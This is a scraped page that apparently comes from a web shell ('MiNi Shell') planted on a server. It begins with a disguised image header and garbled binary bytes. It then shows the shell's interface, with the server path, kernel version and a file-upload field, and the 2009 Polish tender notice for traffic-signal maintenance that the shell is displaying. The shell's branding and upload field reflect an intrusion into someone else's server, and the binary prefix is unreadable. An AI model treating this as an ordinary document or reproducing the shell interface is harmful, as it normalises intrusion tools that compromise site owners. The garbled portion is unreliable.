JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090415/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090415/105984-N-2009.html

<p class="kh_header"><b>Kłodawa: Konserwacja oraz naprawa sygnalizacji świetlnych na terenie działania Rejonu Dróg Wojewódzkich w Gorzowie Wlkp.</b><br>
<b>Numer ogłoszenia: 105984 - 2009; data zamieszczenia: 15.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Wojewódzkich w Zielonej Górze - Rejon Dróg Wojewódzkich w Gorzowie Wlkp. , ul. Owocowa 2, 66-415 Kłodawa, woj. lubuskie, tel. 0-95 7289848, faks 0-95 7289848.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.zdw.zgora.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Konserwacja oraz naprawa sygnalizacji świetlnych na terenie działania Rejonu Dróg Wojewódzkich w Gorzowie Wlkp..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Konserwacja oraz naprawa sygnalizacji świetlnych na terenie działania Rejonu Dróg Wojewódzkich w Gorzowie Wlkp.
Zamówienie obejmuje:         
                                                             
Zabiegi konserwacyjne przy sygnalizacji świetlnej dotyczą czynności:
a)	doraźnych, polegających na przywróceniu normalnego działania urządzenia po zaprzestaniu pracy w
okresie jego eksploatacji lub w czasie wypadku drogowego,
b)	zabezpieczających (profilaktycznych), wykonywanych okresowo, w ustalonych terminach, w celu zmniejszenia prawdopodobieństwa awarii urządzenia, obejmujących kontrolę i wymianę lub naprawę elementów oraz wymianę grupową źródeł światła (żarówek),
c)	bieżących, wykonywanych zazwyczaj z zabiegami zabezpieczającymi, w celu stwierdzenia czy urządzenie działa prawidłowo, dotyczących nadzoru długości cykli, zmiany programu sygnalizacji, regulacji ustawienia komory sygnałowej, czystości soczewek, malowania komór i szafek.
Zakres prac  konserwacyjnych obejmuje utrzymywanie instalacji i urządzeń sygnalizacyjnych w pełnej sprawności technicznej i użytkowej poprzez:
1.	przeglądzie konserwacyjnym sterownika - dwa razy w miesiącu 
2.	przeglądzie instalacji sygnalizacyjnej - raz w tygodniu 
3.	Ciągły nadzór nad prawidłową realizacją programów (planów) sygnalizacyjnych zgodnych z dokumentacją zatwierdzoną przez Zarządzającego Ruchem.
4.	Nadzór nad prawidłowym działaniem układów zabezpieczeń w urządzeniach sterujących.
5.	Zapewnienie jednoznaczności i czytelności wyświetlanych sygnałów świetlnych.
6.	Prawidłową realizację sygnałów dźwiękowych ( dotyczy m. Drezdenko).
7.	Kontrolę prawidłowego stanu zabezpieczeń w układach pomiarowych energii elektrycznej
8.	Kontrolę stanu technicznego i parametrów systemu ochrony przeciwporażeniowej naziemnych urządzeń energetycznych zgodnie z obowiązującymi przepisami
9.	Stały nadzór nad stanem technicznym i parametrami systemów detekcji.
10.	Przekazywanie raz w miesiącu raportu o stanie technicznym i parametrach elementów systemu detekcji: wideodetektorów, detektorów, detektorów przyciskowych dla pieszych ( dotyczy m. Drezdenko).
11.	Stały nadzór nad stanem technicznym i parametrami systemów synchronizacji i koordynacji ( dotyczy m. Drezdenko).
12.	Przekazywanie na każde życzenie Inwestora wydruków kompletu logów /elektrycznych, awaryjnych, detektorów/.
13.	Utrzymywanie odpowiedniej stabilności, sztywności i jakości mocowania konstrukcji wsporczych, gwarantujących pełne bezpieczeństwo wszystkim użytkownikom dróg.
14.	Usuwanie wszelkich awarii sygnalizacji świetlnej oraz powiadamianie o ich zaistnieniu Rejon Dróg Wojewódzkich w Gorzowie Wlkp., oraz dodatkowo w przypadku awarii zasilania natychmiastowe powiadamianie pogotowia ENEA.
15.	Wymiana przepalonych  żarówek natychmiast po stwierdzeniu ich    niedziałania. 
16.	Wymiana żarówek kompleksowo na całym skrzyżowaniu raz w roku lub zgodnie z zaleceniami producenta żarówek.
17.	Czyszczenie soczewek przy okazji wymiany żarówek, ze sprawdzeniem poprawność połączeń elektrycznych i mechanicznych w komorze sygnałowej, ogniskowanie żarówki i jej umocowanie, zawiasy oraz uszczelnienie pokrywy zamykające
18.	Utrzymywanie całodobowego stanowiska przyjmującego fakty wystąpienia nieprawidłowości w pracy sygnalizacji świetlnej oraz bezzwłoczne przekazanie ich własnym służbom celem usunięcia.
19.	Prowadzenie Dzienników eksploatacji sygnalizacji oraz rejestrowanie w nich wymaganych informacji w tym o awariach (wraz z godziną rozpoczęcia i zakończenia ich usuwania), remontach i kontrolach pracy sygnalizacji. 
20.	Sporządzanie, w każdym momencie na żądanie Zamawiającego, raportów o stanie technicznym urządzeń sygnalizacji świetlnej.
21.	Wykonywanie pomiarów ochrony przeciwporażeniowej.
22.	Dysponowanie osobami przygotowanymi do obsługi urządzeń sterowniczych zainstalowanych na obszarze objętym konserwacją. 
23.	Realizowanie zleceń Zamawiającego dotyczących drobnych korekt aktualnego oprogramowania (np. zmiany w harmonogramie tygodniowym) oraz innych drobnych prac wynikających z poprawy bezpieczeństwa ruchu.
24.	Prowadzenie bieżącej oceny stanu technicznego urządzeń. 
25.	Prowadzenie bieżącej oceny stanu technicznego urządzeń oraz wnioskowanie w terminie do dnia 30-go września każdego roku w sprawach dotyczących remontów kapitalnych sygnalizacji świetlnej na skrzyżowaniach objętych konserwacją. 
26.	Malowanie w terminie do dnia 1-go września malowanych konstrukcji wsporczych, których stan techniczny wymaga takich zabiegów. Czynności te powinny zostać wykonane według sporządzonego harmonogramu przez konserwatora do dnia 30-go czerwca 2009r. /harmonogram powyższych czynności należy uzgodnić z Zamawiającym/.

Zabiegi naprawcze przy sygnalizacji świetlnej dotyczą czynności:
a)	usuwanie skutków dewastacji lub zdarzeń drogowych i przywróceniu do stanu pierwotnego instalacji sterowania ruchem.
b)	rozbudowie istniejących urządzeń sterowania ruchem i znaków zmiennej treści do nowych warunków pracy lub zwiększających ich funkcjonalność w zmieniających się warunkach ruchu.
c)	przebudowy urządzenia, całkowitego lub częściowego, po zniszczeniu urządzenia, potrzebie jego modernizacji lub zmian standardu sygnalizacji.
Zakres prac naprawczych obejmuje:
1.	Wymiana masztu stalowego, ocynkowanego (3m)
2.	Wymiana słupa stalowego, wysokiego wysięgnikowego, ocynkowanego /długość ramienia 7m/
3.	Wymiana złączy kablowych, pojedynczych, typu ZK1 (a,b) 250A z członem pomiarowym
4.	Montaż w rowach kablowych, na kablach sygnalizacyjnych wielożyłowych o izolacji i powłoce z tworzyw sztucznych, muf z tworzyw termokurczliwych,
5.	Wymiana latarń sygnalizatorów ulicznych na maszcie o ilości komór 3x300  / S-1 i S-3/
6.	Wymiana latarń sygnalizatorów ulicznych na maszcie o ilości komór 2x200  / S-5 i S-6/
7.	Wymiana szafy sterowniczej MSR sygnalizacji ulicznej na gotowym fundamencie(bez ceny sterownika)
8.	Montaż przycisków sensorowych dla pieszych
9.	Badania i pomiary instalacji uziemiającej
10.	Badania linii kablowej - kabel sygnalizacyjny 7-żyłowy
11.	Badania linii kablowej - kabel sygnalizacyjny 10-żyłowy
12.	Badania i pomiary instalacji skuteczności zerowania

Usługi w zakresie napraw objęte zamówieniem będą realizowane w dwóch trybach:
a)	Tryb awaryjny - maksymalny czas do rozpoczęcia ich realizacji - 5 godz. od chwili przyjęcia zlecenia, dokonanego przez Zamawiającego przy użyciu faksu. Zlecenie opatrzone będzie adnotacją tryb awaryjny,
b)	Tryb podstawowy - zamówienia wg potrzeb - czas rozpoczęcia ich realizacji - 24 godz. od  przyjęcia zlecenia, dokonanego przez Zamawiającego przy użyciu faksu.
c)	Wdrożenie trybu awaryjnego może być poprzedzone przez Zamawiającego informacją telefoniczną, dlatego też Wykonawca musi zapewnić całodobowy kontakt z upoważnioną osobą z podaniem numeru telefonu i numerem faksu. Wykonawca oraz cały personel zobowiązani są do dyspozycyjności i gotowości po uprzednim wezwaniu przez Zamawiającego. 


Szczegółowy opis przedmiotu zamówienia określony został w Rozdziale III Instrukcji dla Wykonawców - Opisie przedmiotu zamówienia oraz Specyfikacji Technicznej.

Zamawiający przewiduje zamówienia uzupełniające, o których mowa w art. 67 ust.1 pkt. 6 ustawy Prawo zamówień publicznych stanowiących nie więcej niż 20% zamówienia podstawowego..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 50.23.22.00-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.05.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O zamówienie mogą ubiegać się wykonawcy, którzy spełniają następujące warunki określone w art. 22 ust.1 ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych w następujący sposób:

1) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień

2) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i  osobami zdolnymi do wy?konania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia:
a) wykażą się wykonaniem, a przypadku usług okresowych lub ciągłych również usługi w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadające swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia wraz z podaniem wartości, przedmiotu, dat wykonania i odbiorców oraz załączeniem dokumentu potwierdzającego, że usługi te zostały wykonane należycie 
przez usługę odpowiadającą swoim rodzajem usługom stanowiącym przedmiot zamówienia rozumieć cię będzie świadczenie usług w zakresie konserwacji i napraw sygnalizacji świetlnych o wartości min. 60.000,00 zł brutto
Dopuszcza się łączenia zadań celem spełnienia warunku wykonania minimalnej wartości usługi.
W przypadku składania oferty przez podmioty występujące wspólnie, warunek posiadania doświadczenia może być spełniony łącznie 
b) dysponują osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia tj. wskażą: 
- osobę odpowiedzialną za realizację zadania,
- zapewnią ciągłą dyspozycyjność i łączność przy pomocy telefonu kontaktowego + faks, 
W przypadku składania oferty przez podmioty występujące wspólnie, warunek personelu może być spełniony łącznie 

3) znajdują się w sytuacji ekonomicznej i finansowej za?pewniającej wykonanie zamówienia:
- przedłożą polisę, a w przypadku jej braku inny dokument ubezpieczenia potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej o wartości ubezpieczenia na kwotę nie mniejszą niż 60.000,00 zł 
W przypadku ofert składanych wspólnie, wszyscy partnerzy muszą spełniać warunek sytuacji ekonomiczno - finansowej tj. przedłożyć polisę a w przypadku jej braku inny dokument ubezpieczenia o.c. 
Dopuszcza się sumowanie wartości polis poszczególnych uczestników składających ofertę celem uzyskania wartości nie mniejszej niż 60.000,00 zł 

4) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust.1 i 2 ustawy Prawo zamówień  publicznych, 

5) udzielą 1-rocznej gwarancji na wykonane usługi (licząc od daty odbioru końcowego przedmiotu umowy) - dotyczy tylko napraw sygnalizacji świetlnych

6) nie dopuszcza się podwykonawstwa w zakresie konserwacji i napraw sygnalizacji świetlnych

Nie spełnienie chociażby jednego warunku skutkować będzie wykluczeniem wykonawcy z postępowania
Dokonanie oceny spełniania warunków odbywać się będzie na podstawie przedłożonych przez wykonawcę dokumentów wyszczególnionych w pkt. 6 SIWZ..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Celem potwierdzenia, że wykonawca posiada uprawnienia do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy Pzp zamawiający żąda następujące dokumenty w formie oryginału lub kserokopii poświadczonej przez wykonawcę za zgodność z oryginałem: 
1)	Aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert lub potwierdzony przez organ wydający w danym terminie,
2)	Aktualnych zaświadczeń właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że wykonawca nie zalega z opłaceniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,    
3)	Aktualnej informacji z Krajowego Rejestru Karnego albo równoważnego zaświadczenia właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art. 24 ust.1 punkt 4-8 ustawy wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
4)	Aktualnej informacji z Krajowego Rejestru Karnego w zakresie określonym w art.24 ust.1 pkt.9 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, 

1. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej zamiast dokumentów, o których mowa w pkt. 1,2 i 4 składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
1a) nie otwarto jego likwidacji ani nie ogłoszono upadłości,
1b) nie zalega z uiszczeniem podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,
1c) nie orzeczono wobec niego zakazu ubiegania się o zamówienie,
2. Pkt. 3 - składa zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą w zakresie określonym w art.24 ust.1 pkt.4-8 ustawy.  

3. Dokumenty, o których mowa pkt. 1a i 1c oraz w pkt.2  powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert .Dokument, o którym mowa w pkt. 1b powinien być wystawiony nie wcześniej, niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.          

4. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, których mowa w pkt. 1)-4) zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania.

Ważność dokumentów zgodnie z opisem jw.  

Celem potwierdzenia, że wykonawca posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, zamawiający żąda następującego dokumentu:
5)	Wykaz wykonanych usług, a w przypadku usług okresowych lub ciągłych również wyk. usług w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie odpowiadające swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia wraz z podaniem wartości, przedmiotu, dat wyk. i odbiorców oraz załączeniem dokumentów potwierdzających, że usługi te zostały wyk. należycie (zał. 2) 
przez usługę odpowiadającą swoim rodzajem usługom stanowiącym przedmiot zamówienia rozumieć cię będzie świadczenie usług w zakresie konserwacji i napraw sygnalizacji świetlnych o wartości min. 60.000,00 zł brutto
Dopuszcza się łączenia zadań celem spełnienia warunku wykonania minimalnej wartości usługi.
Wypełnić druk Doświadczenie zawodowe 
W przypadku składania oferty przez podmioty występujące wspólnie, warunek posiadania doświadczenia może być spełniony łącznie 
6)	Wykaz osób, którymi dysponuje lub będzie dysponować Wykonawca i które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności (zał. nr 3) 
Wypełnić druk Wykaz personelu z podaniem osoby odpowiedzialnej za realizację zamówienia 
W przypadku składania oferty przez podmioty występujące wspólnie, warunek posiadania personelu może być spełniony łącznie
7)	Pisemnego zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w pkt. 6), Wykonawca wskazał osoby, którymi będzie dysponował,

Celem potwierdzenia, że wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, zamawiający żąda następującego dokumentu:  
8)	Polisa a w przypadku jej braku inny dokument ubezpieczenia potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej o wartości ubezpieczenia na kwotę nie mniejszą niż 60.000,00 zł 
W przypadku ofert składanych wspólnie, wszyscy partnerzy muszą spełniać warunek sytuacji ekonomiczno - finansowej tj. przedłożyć polisę a w przypadku jej braku inny dokument ubezpieczenia o.c. Dopuszcza się sumowanie wartości polis poszczególnych uczestników składających ofertę celem uzyskania wartości nie mniejszej niż 60.000,00 zł

Celem potwierdzenia, że wykonawca nie podlega wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych:  
9)	Oświadczenie o spełnieniu warunków określonych przepisami art. 22 ust.1 ustawy Prawo zamówień publicznych (zał. nr 1),

Oferta oprócz w/w dokumentów ma zawierać: 
10)	Formularz oferty (Rozdział II)
wypełnić druk Formularz oferty - ofertę należy sporządzić ściśle wg wzoru druku załączonego przez zamawiającego,
11)	Zobowiązanie do współpracy - należy wypełnić załącznik albo wpisać NIE DOTYCZY (zał. nr 4),
12)	Oświadczenie o telefonie kontaktowym i faksie (zał. nr 5)
13)	Wypełniony formularz cenowy (Rozdział IV)
wypełnić formularz cenowy/kosztorys ofertowy - kosztorys ofertowy należy sporządzić ściśle wg wzoru druku załączonego przez zamawiającego. Sporządzenie kosztorysu w innej formie spowoduje odrzucenie oferty,
14)	Wykaz stawek i narzutów stanowiący załącznik do formularza cenowego

Ofertę należy sporządzić ściśle wg wzoru druków załączonych przez zamawiającego.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.zdw.zgora.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg Wojewódzkich w Zielonej Górze
Rejon Dróg Wojewódzkich w Gorzowie Wlkp. 
ul. Owocowa 2
66-415 Kłodawa.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.04.2009 godzina 09:00, miejsce: Zarząd Dróg Wojewódzkich w Zielonej Górze
Rejon Dróg Wojewódzkich w Gorzowie Wlkp. 
ul. Owocowa 2
66-415 Kłodawa 
/sekretariat/.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com